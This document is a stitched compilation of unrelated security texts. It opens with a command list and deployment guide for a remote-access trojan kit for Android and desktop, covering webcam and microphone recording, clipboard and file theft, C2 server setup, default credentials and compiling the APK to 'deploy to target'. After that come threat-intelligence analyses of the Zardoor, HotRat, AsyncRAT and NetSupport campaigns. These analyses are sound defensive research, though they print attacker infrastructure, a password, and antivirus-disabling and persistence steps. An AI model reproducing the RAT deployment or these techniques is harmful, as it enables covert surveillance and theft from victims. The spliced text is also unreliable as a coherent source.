/start - start pyradm /help - help /shell - shell commands /sc - screenshot /download - download (abs. path) /info - system info /ip - public ip address and geolocation /ps - process list /webcam 5 - record video (secs) /webcam - screenshot from camera /fm - filemanager /fm /home or /fm C:\ /mic 10 - record audio from mic /clip - get clipboard data Press button to download file Send any file as file for upload to target
Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
Set database credentials in c2-server/.env and web socket/.env
Execute database.sql
Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
Modify /etc/apache2/apache2.confxml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
Set C2 server and web socket server address in client functionality/Utils.java ```java public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target
Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.”
We believe an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years.
Throughout the campaign, the adversary used living-off-the-land binaries (LoLBins) to deploy backdoors, establish command and control (C2), and maintain persistence.
At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be others.
Based on Talos’ and third-party research, the use of reverse proxy tools overlaps with TTPs employed by several threat groups originating from China. Still, we can assess the relations of the new threat actor with the existing groups only with low confidence, as open-source tools can be used by any threat actor. The choice of the compromised target does not align with the known objectives of any known threat actors originating from China.
Talos discovered an ongoing espionage campaign in May 2023 targeting an Islamic charitable non-profit organization in Saudi Arabia that exfiltrates data approximately twice a month.
The initial access vector is unknown, however, we observed the threat actor executing a malware we are calling the “Zardoor” backdoor to gain persistence. Then we observed the threat actor establishing C2 using open-source reverse proxy tools such as Fast Reverse Proxy (FRP), sSocks and Venom, a reverse proxy socks5 server-client tool originally developed for penetration testers.
The threat actor customized sSocks to remove dependencies on Visual C Runtime libraries so these tools would rely only on WinAPI libraries and therefore could be executed without unexpected runtime errors.
Once a connection was established, the threat actor used Windows Management Instrumentation (WMI) to move laterally and spread the attacker's tools — including Zardoor — by spawning processes on the target system and executing commands received from the C2, as seen in the commands below.
Execution flow of the Zardoor backdoor
To maintain persistence, the attacker deployed a previously unseen backdoor family we have named Zardoor, which we named based on the file names “zar32.dll” and “zor32.dll”. “Zar32.dll” is the main backdoor component that communicates with the attacker’s C2, and “zor32.dll” ensures “zar32.dll” has been properly deployed with admin privileges. Talos could not obtain a file sample for the dropper used in this specific campaign. However, we found and analyzed other available samples with an execution sequence and filenames identical to the malicious activity we observed and possibly related to the attack we observed.
Based on our analysis of these matching samples, the execution sequence has two parts:
The dropper installs and executes the malicious “oci.dll”
The main purpose of this dropper is to configure “msdtc.exe” to load the malicious “oci.dll” payload. Depending on the target OS architecture, the dropper locates either a 32- or 64-bit “oci.dll” and drops it in the system file path C:\Windows\System32\. Then, the dropper will attempt to stop the MSDTC service and use “msdtc.exe” to help register the malicious “oci.dll” with admin privileges, using the command msdtc -install.
However, if the MSDTC service fails to stop, the dropper patches the binary of the malicious “oci.dll” file to remove the strings 1ISSYSTEM and 1ISAUTORUN, and save the patched DLL to the file path, %TEMP%\win_oci_41aa0d5.dll. Removing the strings will later help determine where to save “zar32.dll” and “zor32.dll” on the victim’s computer.
The threat actor then uses Rundll32 to execute the patched “oci.dll” using this command: C:\Windows\System32\rundll32.exe %TEMP%\win_oci_41aa0d5.dll MainEntry. This patched “oci.dll” will extract “zar32.dll” and “zor32.dll” into the Temp Directory, and launch “zar32.dll MainEntry” using “rundll32.exe”. The MSDTC service will register the malicious “oci.dll” with the msdtc -install command.
If either of these two actions is successful, the dropper configures the MSDTC service to load “oci.dll” and the DLL will be executed. Finally, a cleanup batch script is created and saved to the location %TEMP%\xz330ksdfg.bat. The batch script deletes the dropper and then deletes itself.
Malicious “oci.dll” payload
The malicious loader “oci.dll” contains the backdoor payloads, “zar32.dll” and “zor32.dll” in the resource section. Oci.dll contains two exported functions: ServiceMain() to launch the backdoor module (“zar32.dll”) and DllEntryPoint() to drop the backdoor onto the victim’s machine.
The ServiceMain() export is executed by the MSDTC service and launches the export function MainEntry of “zar32.dll” using “rundll32.exe.”
The DllEntryPoint() function calls the DLLMain function, which determines where to dump “zar32.dll” and “zor32.dll”. This occurs by searching for the strings 1ISSYSTEM and 1ISAUTORUN. If the string 1ISSYSTEM is found in “zar32.dll”, DLLMain drops “zar32.dll” and “zor32.dll” into the System32 directory.
If the string 1ISSYSTEM is not found, then DLLMain will look up the string 1ISAUTORUN, and if it exists, DLLMain will drop “zar32.dll” and “zor32.dll” into the %userprofile% directory. If neither of the strings are found, DLLMain will drop “zar32.dll” and “zor32.dll” into the “%TEMP%” directory. After the payloads are saved, the DLLs and their export function 'MainEntry()' are launched by “rundll32.exe”.
To execute “zar32.dll”, the “oci.dll” export “ServiceMain()” is executed by “msdtc.exe” which then loads “zar32.dll” using the command: rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry. “Zor32.dll” is subsequently loaded from the same exported method with the command rundll32.exe C:\WINDOWS\system32\zor32.dll MainEntry.
Analysis of the “zar32.dll” and “zor32.dll” backdoor files
“Zar32.dll” is an HTTP/SSL remote access tool (RAT) that is capable of sending encrypted data to the attacker’s C2, executing PE payloads in fileless mode, searching for Session IDs, remote shellcode execution, and updating the C2 IP/hostname or port in memory. “Zar32.dll” contains a hardcoded debug symbol path seen below, and has two export functions: MainEntry() and DllEntryPoint.
Once deployed, “zar32.dll” creates three mutexes with the names, 3e603a07-7b2d-4a15-afef-7e9a0841e4d5, ThreadMutex12453, and rrx_%d, where the value of %d is a random seed that is based on the DLLs’ time of execution. If the mutex 3e603a07-7b2d-4a15-afef-7e9a0841e4d5 already exists, the DLL will exit because that indicates “zar32.dll” is successfully running.
To establish a C2 connection, “zar32.dll” needs a program that allows network applications to operate through a SOCKS or HTTPS proxy. The DLL connects to the following URLs:
1.0.0[.]1/index.html
1.0.0[.]2/index.html
1.0.0[.]3/index.htm
The IP addresses are used by Cloudflare DNS services, including the DNS over HTTPS and the communication to these IP addresses may indicate the attempt to bypass the DNS-based detections to attacker-controlled C2 servers.
“Zar32.dll'' attempts to connect to its C2 server using SSL with the following HTTP User-Agents:
64-bit application: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; Trident/7.0; rv:11.0) like Gecko
32-bit application on 64-bit OS: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; WOW64; Trident/7.0; rv:11.0) like Gecko
Once a connection is successfully established, “zar32.dll” supports the following C2 commands:
Encrypt and send data to C2.
Execute remotely fetched PE payload.
Search for session ID.
(Plugin exit).
Remote shellcode execution.
Delete this RAT.
Update C2 IP (IP/domain_name:port).
Do nothing.
We continued to observe several dependencies in the malware’s execution routine. If “zar32.dll” is running when “zor32.dll” is installed, “zor32.dll” will install the “msdtc.exe” service installer.
If “zar32.dll” is not running when “zor32.dll” is installed, then “zor32.dll” starts the “msdtc.exe” service and attempts to create a mutex with the name 6c2711b5-e736-4397-a883-0d181a3f85ae.
Next, “zor32.dll” will check if the “oci.dll” file exists and finish the execution if it does not. If “oci.dll” exists, “zor32.dll” attempts to create another mutex with the name 3e603a07-7b2d-4a15-afef-7e9a0841e4d5. The DLL will exit if the mutex exists, indicating“zar32.dll” is successfully running.
We also identified “zor32.dll” performing checks to maintain persistence if the process has admin privileges using the following procedures:
If the MSDTC service is not running, “zor32.dll” will configure the MSDTC service with the command msdtc -install. If the installation fails, it will keep attempting up to 10 times.
“zor32.dll” attempts to query MSDTC service status and if this fails, it will attempt up to 10 times.
If the MSDTC service is running, then “zor32.dll” will attempt to stop it. If this fails, it will keep attempting to install up to 10 times.
If the MSDTC service is not running, “zor32.dll” will start the service.
Scheduled tasks to maintain persistence
For persistence, the threat actor registers their reverse proxies as scheduled tasks, causing the reverse proxy to execute approximately every 20 minutes to communicate with the attacker’s C2 servers. To achieve this, first, the threat actor confirms if the victim already has scheduled tasks running with the names "KasperskySecurity" or "Microsoft Security Essentialss." Then, the attacker deletes the legitimate scheduled task and creates a new one with the same name for the proxy “msbuildss.exe”.
Talos observed the threat actor in July 2023 storing the remote server’s public key for future tasks. This helps the threat actor to access the remote (Secure Shell) SSH server and set up remote port forwarding, allowing remote servers and devices on the internet to access devices that are on a private network.
The attacker downloads the private SSH key and saves it to the file path c:\users\[Redacted]\.ssh\ with the filename “id_rsa.” The threat actor also saves the file “known_hosts”, containing the public keys hosts that can be accessed using the private key stored in “id_rsa”.
According to the above commands, the threat actor first downloads and checks the contents of the file “2.vbs” to ensure it is the script they would like to execute. The “2.vbs” file is responsible for setting up the SSH remote port forwarding from port 443 on the victim’s device to port 22 on the attacker’s server using the user name root. The file makes sure it has successfully set up the SSH forwarding server by performing the following steps:
netstat -ano | findstr 70.34 is used to find part of the remote IP address 70[.]34[.]208[.]197.
The executable “shd.exe” initiates an SSH connection using the username root and the password "3My[{BK)Ni8a".
Look for a port 443 connection on the victim’s device and kill “ssh.exe” and “shd.exe” using the taskkill utility.
Reverse proxy tools used by the threat actor
As opposed to forward proxies, used to connect devices on the private network to internet services, usually HTTP-based. Reverse proxies allow a computer connected to the internet to create a tunnel and allow remote access to services on the local private network.
Reverse proxies are often used as legitimate load balancers in complex system and application architectures. However, malicious actors are using them to establish communications with otherwise unreachable systems such as RDP servers, domain controllers, files or database servers.
Fast Reverse Proxy (FRP)
Fast Reverse Proxy (FRP) is a reverse proxy tool that can be used to make network services, often located behind a NAT or firewall, remotely accessible. FRP consists of two main components: the FRP client and the FRP server. The FRP client is responsible for forwarding local requests to the FRP server, which in turn redirects them to the internet. This allows applications running on devices behind the NAT or firewall to be accessible from the outside network.
7000 is the default port used by the FRP server components. However, these ports can be configured per the user's needs. A basic setup involves installing the FRP server on a public server with a public IP, and the FRP client on the machine you want to expose. The client and server are configured via respective INI configuration files. Once the client and server are appropriately configured and started, services on the client's machine will be accessible via the server's public IP and the specified ports.
Fast Reverse Proxy (FRP) has been reported to be used by several, predominantly Chinese threat actors to bypass network security measures and maintain persistence within a compromised network. By leveraging FRP, these threat actors can create a tunnel from a machine within the compromised network to an external server under their control. This allows them to exfiltrate data, deploy additional malicious tools, or carry out other activities while evading detection.
The usage of FRP, a legitimate and widely-used tool, makes the malicious traffic harder to distinguish from the normal network traffic, thereby increasing the stealthiness of the attack. However, the presence of an FRP client in the environment may be a good indicator of potential compromise of the network where FRP is not typically used.
FRP is a popular tool and has been increasingly used by threat actors, based on the increase in VirusTotal submissions of FRP tools over the past few years.
Venom proxy
Venom is a multi-hop proxy designed for red teaming and pentesting written in the Go language. It allows the user to create a network of proxy nodes that can act as an admin or agent. The agent connects to either another agent or the admin node. The user controls the network through the control of the administration node and can easily add additional agents to the network.
Venom allows the user, which could also be a malicious actor, to create a botnet of proxies that can be used to remotely control the nodes, exfiltrate data, install additional payloads, etc.
The Venom features are:
Multi-hop socks5 proxy.
Multi-hop port forwarding.
SSH tunneling.
Interactive shell.
Uploading and downloading files.
Network traffic encryption.
Support of multiple platforms (Linux/Windows/MacOS) and multiple architectures (x86/x64/ARM/MIPS).
Other reverse proxy tools and their usage by threat actors
In addition to FRP and Venom, threat actors, predominantly originating from China, based on the previous Talos research and available open-source threat intelligence use several other tools supporting reverse proxying, most commonly:
We have also created a matrix that displays the active threat groups and the proxy tools they are using. Talos assesses with low confidence that the existence of one or more of the tools on a compromised system may indicate the activity of a particular group, as these tools are easily reusable and can be employed by any malicious actor.
Zardoor attacks conducted by an advanced threat actor
Talos assesses this campaign was conducted by an unknown and advanced threat actor. We have not been able to attribute this activity to any known, publicly reported threat actor at this time, as we have not found any overlap between the observed tools or C2 infrastructure used in this campaign.
The threat actor appears highly skilled based on their ability to create new tooling, such as the Zardoor backdoors, customize open-source proxy tools, and leverage several LoLBins including “msdtc.exe” to evade detection. In particular, side-loading backdoors contained in “oci.dll” via MSDTC is a very effective method of remaining undetected while maintaining long-term access to a victim’s network.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 61913, 61914 and 62371 - 62380.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:
Win.Backdoor.Zardoor-10019732-0
Win.Backdoor.ZardoorVMP-10019731-0
Win.Backdoor.sSocksProxy-10019733-0
Win.Backdoor.VenomProxy-10019734-0
MITRE ATT&CK Techniques
Command and Control
T1090.003 Proxy: Multi-hop Proxy
T1105 Ingress Tool Transfer
DiscoveryT1018 Remote System DiscoveryT1033 System Owner/User
DiscoveryT1049 System Network Connections Discovery
Despite the substantial risks involved, the irresistible temptation to acquire high-quality software at no cost persists, leading many people to download illegal software. Therefore, distributing such software remains an effective method for widely spreading malware. This analysis reveals that cracked software often contains hidden scripts that deploy attackers’ malware on victims’ computers, sometimes even containing additional malware itself.
Our focus is on examining the usage of an AutoHotkey script attached to pre-hacked software. This script triggers the release of a variant of AsyncRAT malware that we’ve named HotRat. However, the first step of the deployment process requires administrative rights. Given that abused software often requires high privileges by default, victims do not find the request for additional permissions suspicious. Furthermore, the deployment process compromises system security by disabling antivirus protections before installing HotRat onto the victim’s machine.
HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data. Our research underscores the importance of steering clear of unauthorized software downloads and emphasizes the vast risks tied to these actions, including multiple malware infections and the potential leak of sensitive information. We advise sourcing software from legitimate and approved providers as it ensures safety, legality, and continuous support. Users should also uphold system security measures, like antivirus programs, to safeguard against these evolving cyber threats.
Weaponization and Delivery
Threat actors are seizing cracks available online through torrent sites or suspicious web pages, and they craft a malicious AutoHotkey script, turning it into an executable that carries the same icon as the hijacked crack. The attackers accomplish this by compiling the script using the Ahk2Exe compiler (version 1.1.36.00). As a result, the executable involves several stages that ultimately deploy a .NET implementation of AsyncRAT, which we have named HotRat, and this includes the aspect of persistence.
This mode of infection has been seen in various types of cracked software, and it can theoretically be inserted into both illegal and legal software installers. The most commonly affected group is typically Adobe (Illustrator, Master Collection, Photoshop) and Microsoft (Office, Windows) software. The second group primarily consists of video games such as Battlefield 3, Age of Empires IV, Red Alert 2, and The Sims 4. Lastly, the final significant group is composed of premium software used as system and development tools (e.g., IObit Driver Booster, VMware Workstation, Revo Uninstaller Pro, etc.).
Installation
The installation process involves multiple stages, as depicted in Figure 1, to deploy the final HotRat malware and ensure its persistence on the infected system. It begins with a stripped-down version of an expected cracked software setup. The only function of this setup is to initiate a malicious AutoHotkey script. Interestingly, the setup shares the same icon and metadata as the expected software. There’s also a separate folder containing malicious materials alongside the expected software to be “cracked”.
The AutoHotkey script first launches the original setup of the targeted software, providing the illusion of a benign installation process. However, a PowerShell script concealed in PowerPoint.xml runs simultaneously, aiming to weaken system security, specifically by:
Disabling the Consent Admin, enabling operations requiring elevation to be performed without consent or credentials.
The Task Scheduler is used to maintain the malware’s persistence on the infected system. The embedded script creates a new task with a deliberate typo in its name (“administartor”) that executes a VBS Loader every two minutes. An example of this scheduled task is:
Additionally, the embedded script adds the process name RegAsm.exe to the Windows Defender Exclusion list because this process is exploited for injecting the payload, as described later.
The final operation within the embedded script processing involves the activation of a .NET Extractor. This extractor unpacks malicious files – including the final HotRat payload and support files – into a persistence folder. The script utilizes the Reflection.Assembly method to trigger a UAC method, as exemplified here:
The .NET Extractor has another crucial function beyond just unpacking malicious files. The malware authors detect the most frequently used antivirus software and attempt to deactivate them using IObit Unlocker. The persistence folder also contains IObit files capable of deleting system and protected files via the IObit driver. Finally, the extractor uses a straightforward command to remove folders of the detected antivirus software, as demonstrated here:
IObitUnlocker.exe /Delete <av_folder>
Once the embedded script is successfully executed, all necessary files are prepared for deploying the final HotRat payload. This is accomplished using the VBS Loader, which is run by the previously scheduled task.
HotRat Deployment
Once the scheduled task is set up and eventual AVs deactivated, the scheduled task periodically runs the VBS Loader, which gradually deobfuscates and injects the final HotRat payload, as Figure 2 demonstrates.
VBS Loader
The persistence folder usually contains a VBS script file enrolled in the scheduled task, an entry point for the deployment process. The folder has a few other files used to obfuscate the final payload. To cover every aspect, we include paths found so far list of the persistence folder:
C:\ProgramData\Microsoft\IObitUnlocker
$env:USERPROFILE\AppData\Roaming\IObitUnlocker
$env:USERPROFILE\AppData\Roaming\PerfLogs
C:\ProgramData\PerfLogs
C:\ProgramData\Data
The VBS Loader script only executes a PS1 script located in the same persistence folder; typically, with name Report.ps1. The PS1 script, called PS Loader, extracts two .NET executable files from PNG files located in the same persistence folder using the PNG Steganography. The PNG files do not contain any exciting content, and there is only a single pixel line with pixels in different shades of red.
The current steganography implements a simple method of extracting useful bytes from each red pixel as follows:
The first Image.png file contains the final HotRat payload injected into the host process (RegAsm.exe) via a .NET Injector hidden in the second pe.png file. The injector is a simple .NET application with a simple method:
void Execute(string processPath, byte[] payload)
and the host process path is hardcoded in PS Loader as follows:
Once the process is successfully injected, the HotRat is active, identified AVs are turned off, and persistence is established in the infected system.
HotRat Malware
The final payload that we call HotRat derives from the open-source implementation of AsyncRAT. The malware authors extended the AsyncRAT implementation with new functions to steal various personal information and credentials; it can deploy other malware. So, HotRat is a comprehensive RAT malware. We have identified around 20 newly implemented commands. Most of the commands are realized as a payload service. Specifically, the attackers send a command and zipped .NET payload, which is executed, and the results are sent back to C2. The entry point for each command is a method called PL, as Figure 3 shows.
We have captured no .NET payloads yet, so we just assess functions for each command by its name. On the other hand, there are direct implementations for other commands where we can describe the original functionality of the commands. The table below shows the identified commands and their purpose.
Command
Description
anydesk
Steal credential for AnyDesk – NOT CONFIRMED
Avast
Remove Avast Antivirus – NOT CONFIRMED
backproxy
Setup the Backproxy – NOT CONFIRMED
DicordTokens
Steal Discord tokens – NOT CONFIRMED
getscreen
Take a screenshot – NOT CONFIRMED
gettxt
Send a current clipper text
KillProxy
Kill Backproxy – NOT CONFIRMED
killps
Kill a specific process
klget
Send keylogger log to C2 (stored in %Temp%\\Log.tmp)
Net35
Install .NET Framework redistributable – NOT CONFIRMED
passload
UNKNOW
pong
C2 server’s response to the ping command
ResetScale
Reset display scaling
savePlugin
Save a plugin to the victim machine
setxt
Set a specific text into the clipboard
uacoff
Switch UAC Off – NOT CONFIRMED
Wallets
Steal crypto wallets – NOT CONFIRMED
WDExclusion
Add an exclusion into Windows Defender – NOT CONFIRMED
WebBrowserPass
Steal stored passwords from web browsers – NOT CONFIRMED
weburl
Download an executable from a URL and execute
Table 1. HotRat command summarization
C2 Servers
There are several samples with hardcoded C2 servers and ports. However, most C2 servers are provided through free DNS servers. Moreover, the clients’ ports are different for each DNS record. So, it is sometimes impossible to track the final IP addresses.
We have identified two IP addresses and ports as follows:
185.205.209.206:1114
108.143.240.80:112
The list of captured DNS records is following:
fon1[.]sells-it.net
foxn1[.]sells-it.net
srxy123[.]is-a-geek.com
websites[.]theworkpc.com
dynsys[.]is-a-guru.com
rec[.]casacam.net
samaerx[.]ddnsfree.com
The communication protocol between clients and C2s is the same as the implementation of the AsyncRAT original one.
Anti-Detection and Bypass System Security
Since HotRat is run with admin privileges, it is very easy for attackers to make changes in security. As we noted before, the HotRat Installation process includes specific actions to evade security software for most antivirus software and weaken system security.
There are a few methods to remove antivirus software. The Avira AV is deactivated using a simple command to uninstall the Endpoint Protection SDK, as follows:
Even when the Windows Defender is not deactivated, the installation process adds the whole C:\ path into the exclusion paths.
The rest of the AVs (Malwarebytes, Avast, AVG, and McAfee) detected by HotRat are deactivated through the IObit Unlocker tool that implements a kernel proxy driver to remove system-protected files. Therefore, HotRat can also delete AV files that are identified by a simple test of folder existence in these paths:
C:\Program Files\Avast Software
C:\Program Files\AVG
C:\Program Files\Common Files\McAfee
C:\Program Files\Malwarebytes\Anti-Malware
The HotRat malware also switches off the Consent Admin to perform an operation that requires elevation without consent or credentials because the AutoHotkey script executes other supporting executables that require higher permissions. Hence, the following registry update turns off the Consent Prompt:
The incidence of HotRat malware first started to rise significantly in mid-October 2022. Since then, we have been observing a stable trend of occurrence in the wild.
The most affected regions are Africa, south Asia, central and East Europa, and North America. The map below illustrates the detailed distribution and risk ration of HotRat malware in the wild.
Abused Software
The list of abused software is varied. As we mentioned above, the attackers focus on the most wanted software in the field of video games, image and sound editing, office applications, and system tools.
Unfortunately, due to its popularity, the brand name of one of our products, CCleaner, was also misused to spread HotRat via an illegal copy of the product. We encourage our users to ensure that CCleaner is downloaded directly from our server (ccleaner.com) to ensure they are installing an official (and thus secure) and copy of the software.
The list below summarizes the most frequently cracked software misused by the attackers utilizing HotRat malware.
Infected files are usually stored on public repositories. Specifically, the most seen public share websites are krakenfiles[.]com, send[.]cm, easybytez[.]com, easyupload[.]io, wetransfer[.]com, and www.mediafire[.]com. On the other hand, some samples are located on dedicated servers; for example, 51-83-136-132[.]xyz, s1-filecr[.]xyz. So, there is no central C2 server hosting the malicious files.
When the malicious files are stored on various hosting serves, URLs leading to the files are distributed to the victim’s machines through multiple platforms such as social networks, torrents, forums, or public repositories with the possibility of searching. Figure 4 illustrates the example of Facebook and one forum posts.
Attackers commonly employ a deceptive tactic of actively participating in online forums. Often, victims are searching these forums for assistance in downloading unauthorized software. However, the attackers mislead them by redirecting to alternative URLs where the HotRat malware is already waiting, as demonstrated in Figure 4.
Conclusion
Despite the known dangers, a persistent trend of software piracy exposes users to potential malware infections. In mid-October, we observed a spike in malware activity, wherein illegal software was bundled with a malicious AutoHotkey script that launched the HotRat malware on victims’ computers. The spread of this malware happens through public repositories, with links being disseminated on social networks and forums.
HotRat malware is an advanced version of AsyncRAT, armed with a multitude of spying and personal data theft capabilities. We examined the malware’s deployment process, which is straightforward and utilizes a basic form of encryption, PNG Steganography, for delivering the final payload. Furthermore, the malware exhibits persistence by leveraging scheduled tasks, enabling it to maintain a foothold on infected systems. It also can eliminate antivirus programs, thus endangering the system’s overall security. The blend of uncomplicated deployment and antivirus removal underscores the potential threats posed by this malware.
It is critical to re-emphasize the caution against downloading dubious software from unverified sources, especially those demanding the deactivation of antivirus programs, as it can help curb the risk of malware infections and data breaches.
Our threat hunters have been busy searching for abuse of the recently-released zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.
Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.
Key Observations
This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability within the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine which might be detected by endpoint detection.
Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.
First stage
The compromised website, as pictured in the screenshot below, was used to host robots.txt which is an executable which was disguised as “robots.txt”. We believe the name was used to conceal itself from detection if found in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this file “robots.txt” was downloaded and saved as the file (Sihost.exe) and then executed.
Second Stage, Sihost.exe
When the renamed “robots.txt” – “Sihost.exe” – was executed by msdt.exe it downloaded the second stage of the attack which was a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.
Third stage, favicon.svg
After this file has been decrypted, it is used to download the fourth stage of the attack from palau.voipstelecom.com[.]au. These files are named Sevntx64.exe and Sevntx.lnk, which are then executed on the victims’ machine.
Fourth Stage, Sevntx64.exe and Sevntx64.lnk
When the file is executed, it loads a 66kb shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.
The screenshot below shows the executable loading the shellcode.
Final Stage, AsyncRat
When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443.
We highly recommend Avast Software to protect against the latest threats, and Microsoft patches to protect your Windows systems from the latest CVE-2022-30190 vulnerability.
Over the last few months, FireEye has tracked an in-the-wild campaign
that leverages compromised sites to spread fake updates. In some
cases, the payload was the NetSupport Manager remote access tool
(RAT). NetSupport Manager is a commercially available RAT that can be
used legitimately by system administrators for remotely accessing
client computers. However, malicious actors are abusing this
application by installing it to the victims’ systems without their
knowledge to gain unauthorized access to their machines. This blog
details our analysis of the JavaScript and components used in
instances where the identified payload was NetSupport RAT.
Infection Vector
The operator behind these campaigns uses compromised sites to spread
fake updates masquerading as Adobe Flash, Chrome, and FireFox updates.
When users navigate to the compromised website, the malicious
JavaScript file is downloaded, mostly from a DropBox link. Before
delivering the payload, the JavaScript sends basic system information
to the server. After receiving further commands from the server, it
then executes the final JavaScript to deliver the final payload. In
our case, the JavaScript that delivers the payload is named Update.js,
and it is executed from %AppData% with the help of wscript.exe. Figure
1 shows the infection flow.
Figure 1: Infection Flow
In-Depth Analysis of JavaScript
The initial JavaScript file contains multiple layers of obfuscation.
Like other malicious scripts, the first layer has obfuscation that
builds and executes the second layer as a new function. The second
layer of the JavaScript contains the dec function, which is
used to decrypt and execute more JavaScript code. Figure 2 shows a
snapshot of the second layer.
Figure 2: Second Layer of Initial
JavaScript File
In the second JavaScript file, the malware author uses a tricky
method to make the analysis harder for reverse engineers. The author
uses the caller and callee function code to get the key
for decryption. During normal JavaScript analysis, if an analyst finds
any obfuscated script, the analyst tries to de-obfuscate or beautify
the script for analysis. JavaScript beautification tools generally add
line breaks and tabs to make the script code look better and easier to
analyze. The tools also try to rename the local variables and remove
unreferenced variables and code from the script, which helps to
analyze core code only.
But in this case, since the malware uses the caller and
callee function code to derive the key, if the analyst adds or
removes anything from the first or second layer script, the script
will not be able to retrieve the key and will terminate with an
exception. The code snippet in Figure 3 shows this trick.
Figure 3: Anti-Analysis Trick Implemented
in JavaScript (Beautified Code)
The code decrypts and executes the JavaScript code as a function.
This decrypted function contains code that initiates the network
connection. In the decoded function, the command and control (C2) URL
and a value named tid are hard-coded in the script and
protected with some encoded function.
During its first communication to the server, the malware sends the
tid value and the current date of the system in encoded format,
and waits for the response from the server. It decodes the server
response and executes the response as a function, as shown in Figure 4.
Figure 4: Initial Server Communication
and Response
The response from the server is JavaScript code that the malware
executes as a function named step2.
The step2 function uses WScript.Network and Windows Management
Instrumentation(WMI) to collect the following system information,
which it then encodes and sends to the server:
After sending the system information to the server, the response
from the server contains two parts: content2 and content3.
The script (step2 function) decodes both parts.The
decoded content3 part contains the function named as
step3, as shown in Figure 5.
Figure 5: Decrypting and Executing
Response step3
The step3 function contains code that writes decoded
content2 into a %temp% directory as Update.js. Update.js
contains code to download and execute the final payload. The
step3 function also sends the resulting data, such as
runFileResult and _tempFilePath, to the server, as shown
in Figure 6.
Figure 6: Script to Drop and Execute Update.js
The Update.js file also contains multi-layer obfuscation. After
decoding, the JavaScript contains code to drop multiple files in
%AppData%, including a 7zip standalone executable (7za.exe),
password-protected archive (Loglist.rtf), and batch script (Upd.cmd).
We will talk more about these components later.
JavaScript uses PowerShell commands to download the files from the
server. It sets the attribute’s execution policy to bypass and
window-style to hidden to hide itself from the end user.
Components of the Attack
Figure 7 shows the index of the malicious server where we have
observed the malware author updating the script content.
Figure 7: Index of Malicious Server
7za.exe: 7zip standalone
executable
LogList.rtf: Password-protected archive file
Upd.cmd: Batch script to install the NetSupport Client
Downloads.txt: List of IPs (possibly the infected systems)
Get.php: Downloads LogList.rtf
Upd.cmd
This file is a batch script that extracts the archive file and
installs the remote control tool on the system. The script is
obfuscated with the variable substitution method. This file was
regularly updated by the malware during our analysis.
After de-obfuscating the script, we can see the batch commands in
the script (Figure 8).
Figure 8: De-Obfuscated Upd.cmd Script
The script performs the following tasks:
Extract the archive using
the 7zip executable with the password mentioned in the script.
After extraction, delete the downloaded archive file
(loglist.rtf).
Disable Windows Error Reporting and App
Compatibility.
Add the remote control client executable to
the firewall’s allowed program list.
Run remote control
tool (client32.exe).
Add Run registry entry with the name
“ManifestStore” or downloads shortcut file to Startup folder.
Hide the files using attributes.
Delete all the
artifacts (7zip executable, script, archive file).
Note:While analyzing the script, we found some typos in the
script (Figure 9). Yes, malware authors make mistakes too. This script
might be in beta phase. In the later version of script, the author has
removed these typos.
Figure 9: Registry Entry Bloopers
Artifact Cleaning
As mentioned, the script contains code to remove the artifacts used
in the attack from the victim’s system. While monitoring the server,
we also observed some change in the script related to this code, as
shown in Figure 10.
